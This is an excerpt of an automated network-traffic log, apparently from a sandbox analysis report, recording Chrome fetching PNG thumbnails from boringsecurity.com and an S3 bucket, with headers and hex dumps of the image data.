                                                                          2023-12-10 16:45:02 UTC407INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 34 36 36 2d 31 4f 45 32 33 52
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 1126Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:45:02 GMTEtag: "466-1OE23R
                                                                          2023-12-10 16:45:02 UTC779INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 00 a5 50 4c 54 45 3b 6a 81 1d 1d 1d 1b 1a 19 3a 69 80 3a 66 7c 3a 67 7d 20 20 20 37 64 7b 37 67 7a 3a 64 7c 59 54 4d bd a2 7e 22 23 23 3b 6c 84 36 63 79 16 15 14 b4 9c 7a ad 93 70 51 4c 47 28 3d 47 35 65 7e c3 aa 87 cc b1 8c 34 2f 2a 5f 59 51 3d 3c 39 48 44 3e 30 55 67 2c 4a 59 36 5e 71 ed d1 a8 7a 6c 59 98 85 6b 4a 49 45 27 2f 33 3c 47 4b 98 7d 57 d3 b9 94 3d 55 5e dc c1 9b 88 71 51 e4 c9 a1 6e 61 4e a2 8b 6b 4b 29 15 62 53 3f 32 1d 11 aa 97 7d 88 78 61 51 69 74 68 6b 6a a8 84 51 cb cb cb 53 40 29 ae ae ae c0 6b 59 a4 00 00 00 0a 74 52 4e 53 f1 ff ff ff ff ff ff 60 60 60 e1 21 14 3c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00
                                                                          Data Ascii: PNGIHDR00`PLTE;j:i:f|:g} 7d{7gz:d|YTM~"##;l6cyzpQLG(=G5e~4/*_YQ=<9HD>0Ug,JY6^qzlYkJIE'/3<GK}W=U^qQnaNkK)bS?2}xaQithkjQS@)kYtRNS```!<pHYs
                                                                          2023-12-10 16:45:02 UTC347INData Raw: 0d 31 72 de 01 f0 d5 52 c6 c1 63 ae 2b 21 c5 60 52 fd 7c 7e e9 a5 9b 08 a7 b6 22 ff 60 5e 62 3e 35 d3 f9 bc 3e 39 76 a2 11 46 5a 4d a9 c5 e1 61 68 66 d3 6c 9a a1 73 9c f7 25 69 09 a8 62 39 b8 20 34 ec b4 eb ba f3 59 77 b6 87 e7 c6 4b 5a 02 01 34 a2 40 22 a8 9d 24 8e 76 49 8e df b9 35 05 84 70 e8 4b f3 d1 c0 37 8c db 21 86 e5 59 b5 03 60 ac ea 9a 6d 10 42 38 e0 d2 df 41 04 39 ac d6 e5 e0 dd 61 8c b5 98 00 20 39 00 28 03 4a b9 64 4b d0 66 6a 58 fe c7 dd fa 89 6c 20 83 70 c2 09 b1 02 1f 72 02 20 e0 eb ed b9 29 49 b3 0d 2e 97 c0 85 83 97 40 de 10 0e c9 de de 57 55 28 86 80 00 42 c8 15 03 2e 5f 04 c0 1d c5 95 01 6b b2 20 28 01 cb 2a 03 18 90 13 5e 01 60 ac b7 34 be 01 30 4a 09 21 10 00 be 00 38 80 1c 42 52 7d 7c 7d 18 70 7b 06 dc 00 5a 02 39 97 1a af 00 83 43
                                                                          Data Ascii: 1rRc+!`R|~"`^b>5>9vFZMahfls%ib9 4YwKZ4@"$vI5pK7!Y`mB8A9a 9(JdKfjXl pr )I.@WU(B._k (*^`40J!8BR}|}p{Z9C


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          194192.168.2.54993175.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC592OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC404INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 34 2d 38 32 31 46 56 34 4f 78
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 1609Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:45:02 GMTEtag: 34-821FV4Ox
                                                                          2023-12-10 16:45:02 UTC782INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 01 86 50 4c 54 45 e3 e3 a7 db df a4 a5 06 0a a2 8b 6a 58 48 2f ae ab 7c 8b 76 57 72 5a 37 c5 ad 89 cc b3 8f b8 a0 7e e6 e7 a9 6c 5c 3f 61 4d 33 ae 98 78 7c 6a 4f 37 37 34 c5 c3 8f b4 08 0d 9b 80 65 a7 91 72 b9 b5 85 a4 9e 7b 77 64 45 87 83 66 cd ae 82 c7 2e 2e d9 d9 9f 7e 76 54 37 2b 1b 71 60 46 9a 11 12 d1 d0 99 b0 a0 73 ca cd 95 50 40 27 7e 73 5d 64 54 3a c2 8d 68 59 5a 52 80 82 61 48 37 22 e1 ed ad 5c 52 3f 6b 65 4f d0 52 4d bb 3e 3b d6 df a1 97 8a 61 9f 97 6e 90 80 5a 72 6b 5a dd e7 aa 8a 2f 22 b0 65 4f a7 36 30 b3 4c 49 de dc db cf cd ca 8f 71 4b c8 76 5c cc 9f 78 5f 14 0e 88 0e 0c a1 85 56 95 48 40 d7 df 9f 9d 56 40 d1 c8 92 b7 af 8b 97 89 75 e6
                                                                          Data Ascii: PNGIHDR00`PLTEjXH/|vWrZ7~l\?aM3x|jO774er{wdEf..~vT7+q`FsP@'~s]dT:hYZRaH7"\R?keORM>;anZrkZ/"eO60LIqKv\x_VH@V@u
                                                                          2023-12-10 16:45:02 UTC827INData Raw: b7 3b 9d fb 10 8d 8f 06 38 9a 24 4b 26 70 55 a9 14 0a 95 c3 d6 c4 d8 c4 98 69 7b 93 34 31 02 e0 e8 c9 84 23 32 51 2d 34 af 0a 95 93 a6 29 f6 f9 7c be f5 f9 3f 96 7f ea 07 00 82 b6 cc 81 dd 99 8f d5 5e 6b 6c 6c 62 e2 d3 a7 bd fd dd f9 5c 2a b2 b8 6a 23 ef ea a4 1f e0 e4 4d 27 da 88 2e 7d fc f2 3a 85 da a1 cf 5b 7f 1a ff 5a ed a9 19 b1 0b de dd a8 1f 20 68 8b c3 df 68 20 10 d8 75 74 8c cf d7 f3 d7 76 f4 dd 75 c0 61 b5 37 1c 36 99 7b 08 70 bc cd 69 af 37 90 4c 17 0e 33 ee d9 bf 56 b7 23 56 f7 f6 6a e0 1b d2 99 0b f2 23 81 a9 19 a4 9e 33 ea 7e d8 89 32 81 50 68 25 e5 76 bb 66 1b 19 d4 35 67 19 75 25 8e f4 ce b8 ea 39 83 d9 82 db 20 64 f7 5b 91 ac dd 1a f0 23 59 c4 69 bb 73 30 98 56 20 1c 66 8c 4e c7 0a 8b 6d 27 32 27 ac 34 d0 54 12 72 a1 8e cd 7b fd 60 96 f8
                                                                          Data Ascii: ;8$K&pUi{41#2Q-4)|?^kllb\*j#M'.}:[Z hh utvua76{pi7L3V#Vj#3~2Ph%vf5gu%9 d[#Yis0V fNm'2'4Tr{`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          195192.168.2.5499253.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC669OUTGET /thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_4073_1cb1c9b884.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 42 61 32 39 4f 6d 4f 69 31 43 4f 48 43 57 6c 72 57 5a 4c 46 61 6b 63 4d 30 38 67 4f 34 46 5a 69 58 6e 66 46 38 45 72 42 7a 77 4b 36 72 72 6c 35 79 70 49 62 65 46 6c 69 48 45 31 32 67 72 48 4c 6f 34 51 5a 54 6e 43 73 52 72 73 6f 43 6e 47 64 47 4c 44 2b 70 39 6f 68 51 6b 39 4d 55 69 30 39 30 2b 52 36 46 78 31 4f 56 6c 59 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 37 46 38 36 4e 43 41 41 41 44 4e 54 4a 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 30 36 3a 34 37 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: Ba29OmOi1COHCWlrWZLFakcM08gO4FZiXnfF8ErBzwK6rrl5ypIbeFliHE12grHLo4QZTnCsRrsoCnGdGLD+p9ohQk9MUi090+R6Fx1OVlY=x-amz-request-id: 8ZZ7F86NCAAADNTJDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Fri, 23 Sep 2022 00:06:47 GM
                                                                          2023-12-10 16:45:02 UTC8500INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 77 5c d3 e7 da ff 3d a7 e7 f4 b4 a7 c7 0e ed 50 ab a2 d6 3d 10 10 90 bd f7 26 ac 00 09 7b 8f 04 c2 de 7b ef 21 28 0e 54 10 f7 9e b5 5a b5 d5 da d6 5d ab dd 7b d8 65 1d 09 09 01 72 5d bf d7 75 43 30 52 7b 9e 3e cf 73 9e 9f 50 f9 e3 7e 05 21 04 f3 fd be f3 b9 e6 7d dd e3 5c ec dd 1f cb c9 2b 1c e7 57 1b f3 cf f8 30 61 9a 20 58 f8 be 80 2f ec 17 f2 85 7d 02 be b0 8f 1e c7 d6 d8 35 10 fe c1 6b 20 50 79 14 04 0b af c5 85 0b d3 f9 05 51 ff cc 49 cd 1f e7 6e ef f1 d8 b8 ec e2 a2 71 b1 19 09 33 05 c1 09 ef 09 78 42 14 f2 12 68 81 60 e0 11 e9 71 6c 8d 5d 03 c1 1f bc 06
                                                                          Data Ascii: PNGIHDRMpHYs IDATxw\=P=&{{!(TZ]{er]uC0R{>sP~!}\+W0a X/}5k PyQInq3xBh`ql]
                                                                          2023-12-10 16:45:02 UTC9000INData Raw: d0 b4 a1 e2 fd 43 b3 5e 23 d1 a4 2a a1 a3 28 95 fa bc cc 8d cd c5 2c 8a 2c 2d 03 7f 7f 1e da d9 d8 f4 9d d9 59 29 27 a5 22 1f 4e f9 69 27 e0 ae 1d 6b c5 92 94 00 16 c1 29 53 1a c3 5a 88 d8 f7 6e 9c db 88 fe 1e 76 90 9f 5f 34 b4 eb 8a 16 e5 e0 68 53 72 50 60 10 72 b9 7e 72 6d ad a5 e2 9a ec d0 be 8f 5e 5f 89 14 b5 52 8d 93 72 7e 37 2f 6f 81 e3 9b 4b 7b ea 72 c3 ef 64 c4 78 75 a7 46 72 ee 88 c2 dc 6e 45 f8 d9 c9 e2 02 9d a4 49 e1 ee 3d b9 42 6e 7f 7d 5e 24 6e ac 4b 86 43 1b 0a f1 f8 e6 72 b8 70 b0 19 3e 3f bd 1e 7e b9 b2 15 af 1f 5f 05 b9 09 fe 68 a2 3d 1b 3a 0b dc e0 fd 03 a5 f0 f5 5b 6b f1 c3 d7 57 e2 f9 03 f5 40 b9 b5 8e ba a4 7e 61 28 47 6e 6d ac 25 79 67 6f 5d 0f 99 ce c1 c8 79 40 cd a8 5a 71 7c 25 e6 25 f8 31 25 a6 9a ef 9a 8a 78 6a 6c 80 15 cd 2b 20
                                                                          Data Ascii: C^#*(,,-Y)'"Ni'k)SZnv_4hSrP`r~rm^_Rr~7/oK{rdxuFrnEI=Bn}^$nKCrp>?~_h=:[kW@~a(Gnm%ygo]y@Zq|%%1%xjl+
                                                                          2023-12-10 16:45:02 UTC5837INData Raw: f8 f1 12 57 17 57 f9 7f 67 a0 f4 7f 01 1e 3b ba 7c 70 03 35 4e 9f 3a fd 07 2b 3d ab bb 42 7e 42 af d2 b1 1f 04 5e f5 28 49 78 d8 d7 68 0c b8 ff 10 68 aa ca 30 b8 79 06 43 39 61 b2 79 b3 e6 89 e7 cc 9d 0d 4b 16 2f b9 9b 9c 94 ac 50 d9 6d ff 87 15 ee f7 26 64 aa 04 16 fd 33 66 cc 90 4d 7c 7e 22 cc 7b 65 7e b7 bb 25 47 42 e6 75 70 08 f4 7d 07 d6 09 1e 41 f0 fe 54 0a f7 20 7f 8d 76 6a d1 4d 9f f6 f2 34 d9 e2 25 8b 71 e9 d2 a5 fd 06 06 06 12 3a 49 e6 de 29 81 ff 7d 85 7b 10 74 04 6f 5d 6d 9d c2 d8 d8 58 3c f5 e5 a9 a8 a9 a9 89 6a 33 d4 7a 17 ce 59 24 e6 da 73 e9 7c 09 48 0c 64 07 79 e0 68 f7 c5 1e 79 e0 94 80 29 4d 28 b5 91 93 b2 18 2f 33 11 4f 9d 3a b5 77 d9 b2 65 48 6b da b4 69 b2 e0 a0 e0 5e 55 73 fa 9f 00 4e 75 06 70 44 78 84 74 c2 84 09 bd 1a 1a 9a b8 7c
                                                                          Data Ascii: WWg;|p5N:+=B~B^(Ixhh0yC9ayK/Pm&d3fM|~"{e~%GBup}AT vjM4%q:I)}{to]mX<j3zY$s|Hdyhy)M(/3O:weHki^UsNupDxt|


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          196192.168.2.54992652.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC398OUTGET /thumbnail_Freeky_Crypto_29a0bbd006.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 55 58 33 39 73 56 6f 6d 78 6c 6b 39 50 69 38 72 62 45 61 68 4e 53 4b 7a 35 50 4a 42 4c 5a 65 4b 77 7a 4c 49 66 4f 74 57 49 63 45 54 33 74 51 35 6c 2f 6f 6d 47 35 6e 37 2b 43 38 61 6d 42 6f 7a 56 50 54 73 68 2f 67 45 70 63 67 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 44 47 42 4d 56 31 4e 35 48 57 4d 32 33 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 30 35 20 4a 61 6e 20 32 30 32 33 20 30 39 3a 32 31 3a 34 31 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 34 30 64 30 35 30 32 36 32 35 64 39 63 61 39 63 36 62 65 32 65 32
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: UX39sVomxlk9Pi8rbEahNSKz5PJBLZeKwzLIfOtWIcET3tQ5l/omG5n7+C8amBozVPTsh/gEpcg=x-amz-request-id: 8ZZDGBMV1N5HWM23Date: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Thu, 05 Jan 2023 09:21:41 GMTETag: "40d0502625d9ca9c6be2e2
                                                                          2023-12-10 16:45:02 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 05 58 94 59 fb ff c7 95 b0 31 90 b2 b0 bb 5d bb 03 11 13 a5 44 44 40 04 29 09 91 06 01 45 54 50 51 31 51 a4 c1 c2 6e 5d bb db 55 b7 74 75 cd 35 56 62 82 09 e6 7c ff d7 7d 86 c1 d1 75 df f8 bd ef fb 17 5d bc ae 73 3d 83 33 3c cc 3c cf 67 be 77 9e 73 04 41 e9 db aa 1e 05 04 c9 07 72 ab 67 3c 7e 3d 2f f3 c9 bb db 19 cf 8a 4a 33 9e 15 29 2a 47 e5 35 c8 f8 0f ae 41 e6 93 82 3b c4 d4 aa 63 bb ab 1f 01 04 a1 b9 bb ab 0a 08 b6 b5 f7 7e 6a 96 fe b4 e0 56 c6 73 21 d2 9f 8b 68 b0 b2 63 e5 a8 bc 06 f8 4f ae 41 06 1d 9f 16 dc 5c 73 ef c7 66 07 95 10 08 56 1f d9 53 3d fd 69
                                                                          Data Ascii: PNGIHDRMpHYs IDATxXY1]DD@)ETPQ1Qn]Utu5Vb|}u]s=3<<gwsArg<~=/J3)*G5A;c~jVs!hcOA\sfVS=i
                                                                          2023-12-10 16:45:02 UTC609INData Raw: d0 a9 59 15 c5 d0 ae 75 24 27 b3 a2 79 4b 10 cd a8 52 6f 85 f4 81 aa 5d 4a fb 13 70 47 32 a2 91 ba 78 36 16 ce 99 08 bf 69 83 30 73 62 0f 38 98 77 84 ed 88 b6 b0 1e de 16 36 23 da 61 aa 59 47 4c 33 ef 0c 1f 9b de 58 e2 33 9f 6e d7 1a 00 00 20 00 49 44 41 54 1a db 13 9d 70 3e 2b 08 f7 0f 2e c5 8b 4b a9 78 77 2b 97 2b e5 a1 8c f9 70 b3 19 0c b3 0e 26 f0 ed df 16 19 d3 06 e3 a0 db 28 6e 66 4f 7a 9a e1 b2 af 05 b6 3a 0e c5 98 f6 8d d1 bb 59 43 96 61 3f 10 67 bc cc d9 45 bf 71 d8 60 d1 51 e9 18 1a 25 ca 2d 04 4b 2f 9b b3 5a b9 c6 ef ff 67 e0 68 37 bd d8 93 df 4b 67 8e d2 92 1c 88 d2 41 66 80 0e cb 9d a7 03 b3 ee df 60 78 97 6f e0 33 4e 0b 13 fb 56 65 9e 63 b5 31 b1 8f 40 32 73 62 cf d2 1b 3b c2 f9 cc fa 97 d7 72 54 2a f7 91 4f f7 27 93 7a 2b 0f 05 df 6f e3 8a
                                                                          Data Ascii: Yu$'yKRo]JpG2x6i0sb8w6#aYGL3X3n IDATp>+.Kxw++p&(nfOz:YCa?gEq`Q%-K/Zgh7KgAf`xo3NVec1@2sb;rT*O'z+o
                                                                          2023-12-10 16:45:02 UTC501INData Raw: c5 4e d3 81 e3 50 81 78 d2 d0 0e b2 a3 c9 4e d8 1e 6f c3 0e ad 71 c3 b5 fc 58 f6 eb 99 8d 78 71 35 1b 2f ae 65 f3 45 06 09 22 0e 9f 86 fa bd 1f aa 44 af 66 8b f8 33 5a 96 8b 20 bc 9c c9 2b 0d b7 f7 2d c6 a9 2d 7e 38 b6 ce 15 b4 0d 26 6d fa bb 21 dc 12 11 ae c3 e1 67 df 1f 1e 93 7b 21 6a e6 10 96 1b 3f 0d 27 53 66 63 81 97 19 1b ff 6d 2b 16 3e b2 1b 3b 3a 7b 34 3b eb 63 c1 8e ba 8f 62 e4 db 1d 76 1b c5 b6 39 0e 61 27 bd cc d9 39 8f 91 58 60 6f 5e b2 fc ee 33 59 ce ef 25 48 7f f6 19 55 ee ef 02 9c c6 22 d5 6c 47 11 e0 91 ba a7 d0 73 94 80 7d 17 57 5d bd 0b 0d 5f 8e 6b f1 0c 6d 64 cf d5 e1 5d 23 ab dd b4 59 d0 14 2d 2c 72 d4 66 fd da 0a 8a 5d 2d fb b1 53 1b 5d b1 7d 89 1d db b1 d8 16 7b 57 38 b2 ef 36 fb e2 7a fe 02 fc 74 22 19 8f cf 6f e6 00 d2 fc 03 3a 3e
                                                                          Data Ascii: NPxNoqXxq5/eE"Df3Z +--~8&m!g{!j?'Sfcm+>;:{4;cbv9a'9X`o^3Y%HU"lGs}W]_kmd]#Y-,rf]-S]}{W86zt"o:>
                                                                          2023-12-10 16:45:02 UTC10211INData Raw: 5e 36 9d e6 aa b2 a3 6b 67 e2 e8 6a 47 1c 48 b4 45 4a 90 39 e6 3b f5 2b b5 1e d5 59 3a 6c 68 1f b9 e3 2c 7b b1 99 cd 64 d1 88 a1 03 a5 f3 87 b5 2f 3d 36 a3 3f 2e 78 8f c6 45 df b1 b8 e8 3f 1e e7 67 0e 40 9c 8b a5 64 dd e3 22 79 d6 8b ca 8d 41 fe 27 a0 f1 e3 73 55 de 6d cb 93 42 d0 fc 55 5a 7b 63 eb 3b 60 47 11 e4 8e f1 ab 8b 22 2c 05 7c 9d 60 35 70 a4 72 f9 a1 3a d8 11 52 be 6c 3e cb 9b a7 83 e8 a9 da 2c dd 4f 17 e1 d6 55 65 26 f5 ab 88 5c 26 f6 01 a9 0e 6d 1b 4e 66 6f d7 32 07 46 7b d5 ef 4a e4 00 aa c6 12 5b 10 88 bb 12 ec f9 1e f6 7b 96 3b 62 5f d2 0c ec 4b 72 e2 ca 95 9f 60 5f fe ba 1d 4b 6c b9 62 ee 58 62 c7 21 db a7 06 6c 8d 33 f6 25 da 71 c0 a2 9c fa 97 ce b4 1b 2e b3 71 9a 2a 9e 19 b3 50 14 90 b1 b3 64 f1 c9 ab d2 94 87 6f a5 5b 5e ca 94 79 ef 80
                                                                          Data Ascii: ^6kgjGHEJ9;+Y:lh,{d/=6?.xE?g@d"yA'sUmBUZ{c;`G",|`5pr:Rl>,OUe&\&mNfo2F{J[{;b_Kr`_KlbXb!l3%q.q*Pdo[^y


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          197192.168.2.5499273.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC655OUTGET /thumbnail_916389a9b9dff2fff021cf2a62264925_537b20d36d.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 41 72 37 4d 77 77 62 53 6b 6b 63 58 58 5a 64 72 46 46 42 74 56 44 50 6f 57 50 55 6f 6b 53 77 51 79 35 59 36 6f 38 30 49 31 6e 56 36 34 61 76 53 45 56 64 6a 4f 35 39 35 79 46 2b 56 6f 6f 36 2f 6b 2b 54 2f 74 6a 37 56 51 57 68 31 76 4e 55 35 49 7a 57 33 44 4e 55 57 63 2b 6a 44 61 33 6a 2f 73 30 73 55 55 51 6d 77 43 33 49 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 41 32 45 45 37 52 33 38 35 33 39 50 33 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 30 35 3a 35 38 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: Ar7MwwbSkkcXXZdrFFBtVDPoWPUokSwQy5Y6o80I1nV64avSEVdjO595yF+Voo6/k+T/tj7VQWh1vNU5IzW3DNUWc+jDa3j/s0sUUQmwC3I=x-amz-request-id: 8ZZA2EE7R38539P3Date: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Fri, 23 Sep 2022 00:05:58 GM
